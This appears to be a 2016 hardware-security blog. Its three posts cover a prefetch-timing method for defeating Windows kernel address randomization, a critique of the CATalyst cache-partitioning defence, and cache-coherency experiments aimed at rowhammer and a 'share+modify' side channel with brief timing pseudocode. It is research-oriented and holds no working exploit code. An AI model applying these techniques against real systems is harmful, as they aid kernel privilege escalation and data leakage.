Saturday, February 20, 2016

Breaking KASRL with micro architecture Part 1


Hack in the box & stuff

Skip to Introduction if you are here for the techstuff. I submitted a CFP to “Hack In the Box” in Amsterdam end of may and the talk has been accepted. So I’ll be spending part of my vacation this year presenting some of my research on cache side channel attacks from the last year or so. I’m really excited because I think I actually have some really nice stuff to present – not only is it technically interesting but I think it’s far more relevant that the common perception in the infosec community.  If you have a chance I think it’ll be worth while going. Amongst those who is going to present is Jacob Torrey whose material I covered twice on my blog and who in my opinion really is one of those who is pushing the boundaries of info sec. Also Felix Wilhelm is going and I currently have his master thesis on my night table and thus far it is indeed very cool reading.

Preparing a talk obviously takes a lot of time and since I’m an amateur this is going to cut down on the time I can spend on this blog. I have two more posts in the pipeline (including part 2 of this post), but no idea when I can get them done really.

Finally posting this blog post has been a big dilemma for me. I had the basic idea almost a year ago and I’ve been putting it off again and again because it’s offensive and posting it is a moral borderline case for me. I decided to go ahead but with a heavy heart. Also I have a heavy heart because when I started this blog I wanted to target the ambitious newbie. However there has been a tendency that my work has become progressively less accessible and this particular post is probably the least accessible thus far.

Introduction


KASRL means “kernel address space randomized layout”. It is a feature of most modern operating systems meant to protect against privilege escalation attacks that utilize code reuse attacks such as ROP (return oriented programming). The idea is that if an attacker doesn’t know where the code is, he cannot setup a ROP chain to reuse the code. Therefore a modern operating system load driver on different addresses on each boot and this leaves an attacker in the dark about where the code is located. Code reuse attacks has grown in importance for privilege escalations attacks with requirements for driver signing and wide spread use of “no-execute” settings on stack and other data in kernel mode, thus forcing the attacker to either bypass driver signing to load a driver, attack page tables or reuse existing code.

The attacker has typically relied on information leaks in known drivers that give away addresses that can be used to locate code. However last year I had an idea how we might use the CPU design for our information leak and this will be the topic of this blog post. That we can use CPU design against KARSL is particularly bad news because CPU’s are not subject to updates as software are and in the past intel has not been forthcoming with security fixes in this respect. Also relying on CPU for an attack means that mean thing generalizes across operating systems – this means many of the findings I’ve made here for Windows 7 will lend themselves to other platforms. On the other hand these kind of attacks may be applicable only on a subset of CPU’s. I think that all modern Intel CPU with a 3rd level cache i3,i5,i7 and xeons from Sandy Bridge and up is likely to be affected and possibly other CPU’s as well.

Finally I’d like to say these kind of attacks has been made before but I’m not aware of any with the same methodology as mine.

Finding drivers

The idea evolved around the “Prefetch” instructions. These instructions are meant for software to give the prefetcher a hint to load a specific address into a certain cache level because the software will need it shortly. This can be used to significantly improve performance as the prefetcher runs independent of the CPU and thus memory is fetched before it’ll be used. There is however a interesting thing with the prefetch instructions that caught my eye: They don’t cause exceptions (except they are incompatible with a lock prefix)[2] Intel. However they take a virtual address as input and will need a physical address for loading memory and placing it in the cache. Thus they may entirely by pass memory protection mechanisms further that seem relatively plausible because since they aren’t actually reading data they should not in any way or fashion allow an attacker to read memory he isn’t supposed to. Consequently intel might have decided that there wasn’t a security issue.

My first idea was to use the prefetch instruction in a modified prime+probe or a evict+time attack. That is make a guess about an address in a driver, then use prefetch instruction to load the cache entry and either evict+time or prime+probe to tell if you actual hit the address. This of cause is pretty slow and there is a lot of memory you’d need to run this on before you’d actually find your way around the kernel address space. I’ll get back to this in another post.

The second idea is what if the prefetch instructions leak information through it’s execution time? I thought of 3 scenarios:

1)      Prefetch does not leak information (e.g. the DS descriptor has a limit, prefetcher doesn’t do anything on kernel memory when called from R0, is designed as  constant time etc.)
2)      Prefetch is slower on virtual addresses which actually maps to a page. One reason could be because telling the prefetcher to load the cache takes time
3)      Prefetch is slower on addresses which is not does not map to a page because searching all page table entries for an address is slower than just searching till you hit something.

Well. First I dug into the descriptor issue mentioned in 1) because that’d be a no go and since I recall that 32bit XP actually has a limit on it’s DS descriptor making it useless to access kernel mode memory. It seems though that this is not the case in 64 bit mode as 5.3.1 of the [1] Intel clearly says that limits are not checked at run time. (I think there are some exceptions for FS/GS) So time to load up a debugger and write some code. First I loaded live KD and dumped a map of the drivers using the “lm n t” command. Then I wrote some user mode code that times the prefetcht2 instruction. I picked the prefetcht2 instruction because I assumed loading the largest latency cache was most likely to be actually carried out by the prefetcher and thus most likely to be successful. I then wrote up code to time prefetching an address 20 times and pick the lowest timing found. My argumentation here is that there is noise in memory sub system (hence the multiple accesses to try and cancel it out) and the lowest value because searching for the lower bound would tell me more than an average. Then I picked two addresses to time in this way. One a few thousand pages below the first loaded driver and one in the first loaded driver. Finally I repeated the experiment a 1000 timers. And voila the prefetcht2 instruction is faster on a virtual address that is actually mapped. I speculate that this is because searching through PTE’s is aborted early and thus faster. I think I know how to figure out if this is true and I may get back to it in another blog post. So I moved on and wrote up a small program that’d scan a small portion of the kernel memory address space and tell me if a page was mapped or not and compared it to my module list. It worked beyond any expectation.

So how fast can I scan? It takes about 112 CLK’s for a miss and 85 CLK’s for hit on my wife’s sandy bridge computer. An approximate value (with 20 timings per address) including code over head is that I run around 500k probes per second. With a 64bit address space that too is impractical to scan the entire address space with. However first we should notice that modern operating systems are paging and thus we only need to probe once per page. A page is usually 4096 bytes large. Also on windows 7 it appears that the 16 upper bits are all set for drivers further reducing the problem. Finally Windows 7 loads drivers continuously – on my computer around 100 mega bytes of them – and thus I only have to run through a 48 bit address space in 100 megabyte steps to find where the drivers are hidden. This reduces the problem to a practical 6 second problem. Now I do get a few false positives on this scan. Other stuff than drivers maybe located in this space and I may have some tuning problems and additional probing could further reduce these. But I consistently find the drivers and only a few false positives.

What was a blessing above – that the drivers are clustered into one big chuck of pages – is a curse going forward. The problem is that we do not get the size of the individual drivers and thus is unable to tell which is which for a gadget search. However I believe we can solve this problem with modified versions of evict+time and prime+probe attacks. This however will have to wait for part 2 of this blog post.

Thanks

I need to express my gratitude to Nishat Herath of Qualys for discussions on this topic I had with him.

Litterature

[1] Intel: “Intel® 64 and IA-32 Architectures Software Developer’s Manual. Volume 3A: System Programming Guide, Part 1”.http://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf
[2]Intel: “Intel® 64 and IA-32 Architectures.Software Developer’s Manual.Volume 2 (2A, 2B & 2C): Instruction Set Reference, A-Z


Sunday, February 7, 2016

Comments on CATalyst the first use of CAT to mitigate Cache Side Channel Attacks

Recently Lui et al.[1]  released a new very interesting paper. This paper will be the topic of this blog post. In my “Rowbuffer side channel attacks“. I speculated that CAT would be interesting as mitigation for cache side channel attacks. It turns out that I was right about that. I did however get some of the details of how CAT works wrong. Yuval Yarom of University of Adelaide was kind enough to correct me and that became an errata. This new paper, that Yuval co-authored, how ever proves that CAT could indeed play an import role in defending against cache attacks. They call their method “CATalyst”. In this blog post I make an ultra short and incomplete summary of how CAT and CATalyst work for some context. If you wish to get into the details of it you really need to read the paper. Though I will be critical of CATalyst in the this blog post, I should make it  very clear that I consider CATalyst a big step forward towards defense against cache side channel attacks and that I’d much prefer to have CATalyst than nothing at all – which it’s my impression is the current state of cloud computing.

Ultra short summary of how CAT works

Cache allocation technology or CAT is a feature of some newer Xeon’s. It’s not meant to make it into consumer PC’s. Newer means some Haswell’s has CAT, I’m not sure how common it is in Broadwell or Skylake. CAT was meant as a performance enhancement tools to make it allow a supervisor or hypervisor to allocate more L3 cache to performance critical operations. Essentially the hypervisor or supervisor can assign a “Class of service” (Short COS) to an MSR for an application. There are currently 4 COS’s. Each COS is associated with a bitmask that describes which ways of the cache can be evicted under this service class. Thus any application can have reads/writes and flushes served from any way just as before, however only evict ways that is compatible with the COS. The intended effect is to shield high priority applications from competitive eviction by lower priority applications.

Using CAT to defend against CSC

Since flush can be served from any way in the cache as always, CAT is incapable of defending against flush+reload and flush+flush. However those attacks can be thwarted avoiding sharing memory across trust boundaries. [1]Liu et al. uses this to defend against these attacks. 

This makes the most important enemy “Prime + Probe”. Recall prime and probe works by priming a cache set to consist of attacker only data. Then wait for victim activity and finally access the data it had in the cache – if it incurs a cache miss the attacker knows that the victim used the cache set.  With CAT able to prohibit evictions in parts of the cache, it is capable of making it impossible to prime the cache and thus make prime + probe impossible.

However it would be bad karma to just deny eviction as a general rule because that’ll come at a huge performance cost. Deny eviction and the cache cannot adapt to the ongoing work and become inefficient. With 4 COS values it’s however possible to partition the cache in to only 4 pieces. That again is a bad idea, because in the cloud where you typically have say 16 to 64 simultaneous VM’s on one computer.  It could only make it more difficult for the attacker to get co-location by factor 4, but not thwart anything.

 Liu et al.[1] deals with this problem rather elegantly. They divide the cache in two: A secure partition and insecure partition.  Since the secure partition is shared among all VM’s prime + probe would still be possible. To deal with this only so much data can be loaded into the secure partition that absolutely everything can be cached. They then make sure that everything in the secure partition is then cached. The size of the secure partition is kept small to minimize the performance penalty. Finally the VM keeps control of the COS and bitmask to prevent any evictions in the secure partition. Thus everything in the secure partition is pinned in the L3 cache and access to memory in the secure region will never miss the L3 cache. The VMM exports API to the VM’s operating systems to load and unload pages into this secure partition for applications in the VM’s to use. To prevent a DoS attack on this each VM can only load it’s share of secure memory.

Implementation is made possible through the fact that a VMM gets called when MSR’s are written. Thus it can reserve a COS for itself for loading pages into the secure partition and prevent VM’s from gaining this COS as well as setting a bitmask that would allow access to this.
The really cool thing about this is that it’s the first suggested mitigation so far that both looks iron clad and is feasible in current hardware without being tied down to other micro-architectural designs such as the complex-address function for cache allocation and at a reasonable performance cost as well. 

Another feature of CATalyst is that it will make row buffer side channels quite difficult as reads are served entirely from cache, thus not activating a row in D-ram. It might not be all together impossible to use row buffer side channels in this as secure partition may share rows with insecure memory and r/w memory can cause row activation when write operations trigger write-back operations for reasons of cache coherency. I don’t think this is a real problem though.

Problems with this method


I see three problems with this method however:
1)      Modern hardware is required
2)      Changes to VM, OS and applications are required
3)      The secure partition is small.

Modern hardware
The requirement for modern hardware is a short term problem. In time modern hardware will be available in the cloud and thus it’s not really a big issue.

Changes to VMM, OS and applications
For the second problem OS and VMM could probably be easily changed with the current focus on the cloud.  In fact I think the OS changes needed could be implemented by 3rd Party drivers and thus easily made available. Applications pose a much bigger issue though. Typically a cloud consumer uses multiple applications each with their own security requirements and they need to be updated to support CATalyst etc. This problem could be overcome, but certainly a bigger issue than the first. To my knowledge, historically security implementations that require changes to a range of applications have not fared well in the market place.

The small partition size
The real issue for me with CATalyst is the secure partition is small. The obvious maximum size is the cache size of the system to be shared by all VM’s   (say 20 megabytes). That however would be prohibitively expensive performance wise – which is why the authors are talking about taking only a 10th of that effectively limiting the secure partition size to 4-16 pages per VM. Increasing the size is probably associated with (near) exponential performance cost: Caching the most used cache line brings more than caching the 20th most used cache line.

The authors argue that this isn’t a problem: “A few secure pages are usually sufficient
for protecting the security-sensitive code and data since these are usually small”. I beg to differ. For a single crypto implementation this is obviously true. The problem is that many VM’s will have a number of crypto implementations and operation typically threaded.  Remote access technologies may very well use a different implementation than the web shop, that again uses a different one than SSH and so on and so forth. Not to mention custom implementations. But security requirements doesn’t limit themselves to crypto. Oren et al. [2] Showed us that we can infer mouse movement and implement covert channels with cache side channel attacks. Gruss, Spreitzer & Mangaard[3] showed us that we can spy on keyboard input in some circumstances. Why care about crypto if your password leaks? I dare speculate that using machine learning technology combined with cache side channel attacks on the non-secure partition a great many secrets could be leaked from a co-located victim. After all, which information we each consider sensitive is subjective and cache side channel attacks apply to a very wide range of data.

Even if each of these things fit individually in the secure partition bad programming practices, hangs and crashes are likely to, at some point, allow a VM to DOS itself by filling the secure partition and not release appropriately. Not to mention the overhead that would come from often loading pages into secure memory. Further I wouldn’t trust software developers in general to correctly identify security critical code in the first place.

Litterature

[1] Fangfei Liu, Qian Ge, Yuval Yarom, Frank Mckeen, Carlos Rozas, Gernot Heiser, Ruby B. Lee (2016). CATalyst: Defeating Last-Level Cache Side Channel Attacks in Cloud Computing. https://ssrg.nicta.com.au/publications/nictaabstracts/8984.pdf

[2] Oren et al (2015): “Spy in the Sandbox, Practical Cache Attacks in Javascript”; Yossef Oren, P.Kemerlis, Simha Sethumadhavan and Angelos D. Keromytis. arXiv: 1502.07373v2


[3] Gruss, Spreitzer & Mangard (2015): “Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches”

Monday, February 1, 2016

Row hammer, java script and MESI

Ramblings

There is no tech info here. If you don't care abot my ramblings skip to intro. It's been a while since my last blog post. With 22 blog post of varying quality in my first year of blogging it was time to see to it that I got around to my other hobbies and the usual social commitments around silly season allowed me to enjoy life in other ways. Also I finally got myself a computer and it takes forever installing it. Most of this post was written while installing operating systems on my new computer. So this blog post is likely the last blog post written on my wife's Sandy Bridge. From now on I'm on a cheap Broadwell laptop (that much to my dismay doesn't row hammer either). The good thing is that my new laptop can be crashed and I hope to get back to some of the projects that require kernel mode code real soon. 

Introduction

I was reading around for another blog-post that’ll get around to soon when I stumbled upon an intel document that caught my attention. It hinted at that a read/write pattern could flush the cache and that probably relatively fast.  In other words – row hammer. And it seemed like I could do this project in just a few hours and given how long it had been since I’d posted something I figure I’d do this first and then return to the project I was reading up on. I actually thought that this where going to fail so the working title was “Fail at Row hammer js 2.0”. There is a tendency that people never publish about their failures. But reality of this stuff is that you fail quite frequently (I do at least), but you always learn something in the process and I think it’s a shame that this knowledge generally isn’t shared. I turned out to be wrong about two things – I thought the idea could easily be dismissed, but despite not making the final proof it looks like the idea has merit. The second thing I was wrong about was how long it’d take me to finish. Most of that time was spend fighting Visual Studio. Optimize and it’ll move your instructions around e.g. memory access, then clflush instead of the other way around makes a huge different. Don’t optimize and you’ll have any amount of stack access within your timing section. With just a few hours to spare here and there I were trying again and again to get it to work instead of just go handwritten asm . Something I ended up doing anyway. As usual as the topic is offensive in nature I’ll share source codes only on request.

Why do we need RowHammer.js 2.0?

The short answer is that we don't. The current rowhammer.js works by figuring out which addresses correspond to a cache set and using that information to build a set of addresses that when touched evicts the two addresses required to row hammer. There are currently two ways of doing that. Either by assuming large pages which leaks information about address and cache sets, but an asssumption that is rarely met in the real world or by timing memory access with an accurate timer. However java script is increasingly disbanding access to a timer accurate enough to tell a single cache hit from a cache miss. Java does this to prevent spying using cache side channel attacks, but it has a side effect on row hammer. This makes it difficult to figure out which addresses correspond to a cache set. However not impossible since that, unlike for spying, it's possible to repeat the experiment until enough signal is available to pick it up even with a low accuracy timer. 

Another reasons could be that we might be able to work around the current cache-miss-performance counter detection of row hammer that has been suggest by myself and Nishat Herath of Qualys. Now before you attackers out there start to cheer too much. I'm fairly certain that a new detection and mitigation along these lines is feasible.

The rough overview

Take this scenario: Core 1 and Core 2 are both reading the same cache line. Core 1 doesn't read it much and get it from L3 where as Core 2 reads it a lot and thus retrieves it from L2. At some point Core 1 decides to write to the cache line. Since L2 at Core 2 is disconnected from Core 1 this becomes a coherency problem. The two most likely solutions are these:

1) When writing to a cache line used across multiple caches. Stop all access to this cache line, write back the modified cache to memory, flush the cache hierarchy and "reload" the memory. There is an intel document that can be read as suggesting that this is what happens: "The frequent coordination required between processors when cache lines are marked ‘Invalid’ requires cache lines to be written to memory and subsequently loaded."

2) The second solution is a bit simpler. There is no reason to actually flush the L3 to memory and reload - coherency is guaranteed if L1 and L2 are flushed on all cores since L3 is shared. Thus the scheme could just be: stop all access to the cache line, modify L3. Finally invalidate all lower latency caches (L1 and L2 ) on all cores .

In scenario 1 the possibility of using this to avoid clflush exists and this might give us a way to do row hammer without clflush - potentially even in Javascript. Because this method only requires reading and writing of variables the only micro architectural knowledge we'd actually need would be to figure out if two addresses belong to the same bank and have a thread running on two different cores. [1] Seaborn and Dullien(2015) demonstrated that finding two addresses that belong to the same bank can be done by chance alone. It also seems likely that we could get a thread running on another core. Thus if it'd work we'd eliminate the need for a timer and no special special opcodes would be required. In fact there is a good chance that the method could apply to other devices with similar cache implementations.

The cache coherency protocol

I'll spend a tiny bit of time on the cache coherency protocol of the modern intel CPU's. The protocol insures that multiple caches contains a coherent representation of memory. The protocol is a slightly modified version of the MESI-protocol. The modified protocol is called MESIF, but the literature is much better on MESI if you choose to research this you should start there. The MESIF protocol states that any cache entry is always in one of 5 states: Modified, Exclusive, Shared, Invalid or Forward. The MESI(F) order is not relevant - it just makes the acronym pronounceable. The states are as follows:

Invalid: The cache entry starts out its life as "Invalid". Meaning no meaningful data is stored here. It is also the state that a cache entry enters when we use clflush.

Exclusive: This state means only one cache contains this cache line. Thus in this state there is per definition no cache coherency issues.

Shared: This state means that the cache line is loaded in two or more caches.

Modified: This state signifies that cache line is different in the cache than in main memory - thus that 
a memory store operation is required should this cache become flushed.

Forward: This is a special case of "Shared". It essentially means if multiple caches holds a shared copy of a cache line and that any read operation should be served from here.

The protocol then specifies that for a given cache line, only transistions between these states are possible:

M
E
S
I
F
M
x
x
x
Ok
x
E
x
x
x
Ok
x
S
x
x
Ok
Ok
Ok
I
ok
ok
Ok
Ok
Ok
F
x
x
Ok
Ok
x

Of interest here is that if any cache (say L3) is in the S state, the cache line cannot be directly modified because there is no valid transition to from S to M. It is this feature we hope to utilize.

Another feature of the intel cache manager is snooping. Any memory request is send out on the bus so that every core can report back the state of the cache - that is if and in what state the appropriate cache line is available on the processors caches.

Also I need to mention the Request for Ownership or (RFO for short) transaction. When you're writing to a cache entry that is either shared or invalid you use an RFO. The RFO is an exclusive command - that is no other command executes on the cache hierarchy for the cache line while the RFO is processing. The RFO invalidates all other entries with the cache line in entire cache line loaded in the entire cache hierarchy thus clearing the way for modifying an entry.
We can now outline the two scenarios again.

Core 1 issues a read. The memory is not in the L3 cache which means it'll be loaded into a way in the appropriate cache set : Either there is already an invalid way in the set (one of the ways is marked as I) or an eviction takes place and one of the ways is marked as I. Then data is loaded from main memory and the way is marked as E(xclusive).

Core 2 now reads the same memory. The cache manager decides for some reasons that core 2 needs this cache line a lot of thus wants' to fill L2 with this particular cache line. Consequently it finds an empty way (or makes one through eviction) in appropriate set in L2. Then it loads the data from L3. Now both the L3 and the L2 cache holds a copy (Intel cache is inclusive - what is present in L2 must be in L3 too) and thus both entries now get stamped as S(hared).

Core 1 now places the write operation on the bus. The L3 cache can immediately tell that it's present  and shared. Consequently the L2 must be invalidated. Thus an RFO is send out on the bus and the L2 cache is invalidated. The question here is what happens now.  
Option 1: Modify L3 and set it to Modified.
Option 2: Modify L3, write it back to main memory.  Then set the appropriate entry to Exclusive.
Option 3: Modify L3, write it back to main memory. Invalid date L3. Reload from main memory.

For us to use this method for row hammering we'd need either option 2 or 3 since both read and writing to main memory activates the row either can be used for row hammering. 

Empirical data

Unfortunately grey theory is just that. Intel tweaks around with their processors and details maybe changed for better performance. But we do have the option to see if we can verify it empirically.

 As always when timing things in the memory sub system there is a lot of noise. There are many sources for this noise, but the bottom line is we need to deal with this noise. My rough method has been to sample between 200 and 1000 timings depending on just how much noise I get in my measurements, Then I remove 10% slowest times assuming they were slow due to noise. This is not something that would make my old statistics professors proud, but it’s easy to implement and probably doesn't introduce too much bias anyway. Second we have a ball park idea about how long it’ll take for a given memory operation. Say an uncached memory operation usually takes more than 100 CLK’s on my wife’s Sandy Bridge. Thus if I’m timing uncached operating I assume something went wrong if the time spend was less than 100 CLK’s. This approach  significantly reduce the noise and actually allow me, by looking at the remaining data, to get an idea about what’s happening while I’m writing the code.  Once I’m confident in the code I calculate average and standard deviation and formally test my hypothesis.

So my first step was to get some ball park figures. Because it’s difficult to benchmark how long a an “Uncached” memory write is as it's somewhat undefined, I use the memory read as a proxy for what amount of time it takes to actually access memory.  Cached memory access takes around 66 CLK’s on average. While it’s uncached counterpart (Using CLflush+mfence) to make sure it’s not in cache takes around 200 CLK’s. A Clflush on an address loaded just prior to that takes some 112 CLK’s. Finally I time a write operation (mov [Pointer],1) when I had previously loaded it into L3 and when I hadn’t. Both takes around 90 CLK’s.

These data makes a fair amount of sense. Obviously it’s a lot faster to read from L3 than it is to read from memory. A Clflush operation in essence needs to block the cache line in the hierarchy and then actually invalidate the cache entry and with my fencing we probably need to wait for process to be completed. Consequently we’d expect it to take longer than a cached read, but less than an uncached read that actually has to drop down to memory and fetch stuff.

Now I code up the scenario sketched above.:
1.       Main Thread: Make sure it’s running on core 1. Set affinity and sleep to invoke scheduler
2.       Main Thread: access address of interest (AOI) 6 times which in the past have given me good results on being loaded into L3 and only L3.
3.       Main Thread: Start second thread and wait for it to finish
4.       Second Thread: Make sure it’s running on core 2. As above.
5.       Second thread: access AOI 10000 times to load it into L2
6.       Second thread: Finish
7.       Main Thread: Modify AOI  and time with RDTSC -  mov [AOI],1

And voila: now it mostly takes around 170-210 CLK’s to write memory. This tells me that I’m on to something. It’s much slower than a normal write operation so we can assume that something is going on. It’s also far slower than the clflush from my bench line which should be a flush of a cache entry in the E(xclusive state). In fact the time suggests that we are hitting main memory. That it isn’t always between 170 -210 CLK’s and sometimes far below it seems to suggest that from time to time my address of interest get’s removed from L2 on core 2 before I actually modify it. Maybe the combination of destroying the second thread and waiting for it to be done is enough for other system activity to evict AOI from L2.

But we don’t actually have to live with this circumstantial evidence. We might be able measure if we actually hit memory. It goes like this. When writing to physical memory the row you wish to write in is loaded into the row buffer of the ram. Then it’s modified with the data being written – remember the row buffer is 8kb where as a cache line is only 64 bytes. Finally the row buffer is written into the appropriate row. Consequently if we make sure that another row is in the row buffer by reading it from physical memory before modifying the address of interest we can do a row buffer side channel attack to see if the row was now removed.  

Just prior to modifying I therefore added a function that randomly access physical memory in a large buffer 200 times, thus making it unlikely that the address of interest’s row is in the row buffer. I then modify the address of interest as usual and then access the row of address of interest. To avoid using the cache line for the AOI I make sure to place the AOI on a page boundry and access the memory 2 cache lines further ahead. Thus I have no cache conflicts, but from [5]Seaborn(2015)’s mapping of the physical memory I can be sure to access the same row.

When I read an address from a row, that is in the row buffer as I did for my benchline I get read times of around 200 CLK’s. Interestingly if I immediately access the same row the in the scheme above, it takes around 350 CLK’s for it to finish the request. This seems to indicate that a required resource is unavailable at that time. I have only unfounded speculation what that could be. However if I execute a loop of a significant amount of dummy instructions (mfence) and then access the memory I get times around 208 CLK’s which is consistent with the current row being in the row buffer.  Thus I think I have a strong case that I actually activate the row in D-Ram which is ultimate prerequisit for row hammering.

Can we simplify the attack vector?

If you are smarter than I were you’d probably already know what I’m hinting at. MESI(F) is a protocol to keep coherency between caches – not cores. The core story might just have been a detour in my thinking. What if we load the address of interest into L2 and then modify it on the same core. We’d have exactly the same effect without the threads. At least with a high number of accesses to make sure that the AOI is elevated to L2, this indeed seems to work though the latency on modifying drops from 200 to around 150 CLK's.

Good enough?

I don’t know if we can get this fast enough for actual row hammering. I don’t know how fast we can get two addresses into L2 and then cause them to be written back out again. And since I’m currently without accesses to a computer with ram susceptible to row hammer  I’ll leave it to other people to figure out if it works. Also I’m not really strong in Java script and thus have no clue if the threaded version would really be implementable in JS.  I cannot imagine a world where the non-threaded version isn’t implementable in JS.

Yet another cache side channel attack

Obviously we have another type of cache side channel here. With it taking longer to write to shared memory we know for sure that we can use the method for a side channel attack – thus we can detect if a victim uses a read/write address enough to place them into L1 or L2. For lack of a better name I call it share+modify. There can be many different actual implementations of this cache attacks. This simplest might look like this in pseudo code:

1.mfence
2.StartTime = rdtsc()
3. Modify(address of interest)
4. mfence
5.Information = Rdtsc()-StartTime;
However it's an impractical side channel attack. The reason is that shared memory with read/write access is required. While shared read-only memory is common through dedublication and shared libraries, shared read/write memory is quite scarce. The advantageous thing from an attacker view point is is that it might trigger other performance counters than the classical flush+reload and thus avoid suggested detection for this attack. Might. Also the chances of a victim actually loading stuff into L2 is much lower than L3 and consequently a lot less information is likely to be revealed by this attack.

Litterature

 [1] Mark Seaborn; Thomas Dullien (March 9, 2015). "Exploiting the DRAM rowhammer bug to gain kernel privileges". googleprojectzero.blogspot.com. Google. Retrieved March 10, 2015.
[2] Daniel Gruss, ClĂ©mentine Maurice, Stefan Mangard (2015). „Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”. http://arxiv.org/abs/1507.06955
[3] David Levinthal(201x). Performance Analysis Guide for Intel® Core™ i7 Processor and Intel® Xeon™ 5500 processors. https://software.intel.com/sites/products/collateral/hpc/vtune/performance_analysis_guide.pdf
[4] Intel (201x).”Avoiding and identifying false sharing among threads”. https://software.intel.com/en-us/articles/avoiding-and-identifying-false-sharing-among-threads
[5]Seaborn(2015):” How physical addresses map to rows and banks in DRAM”;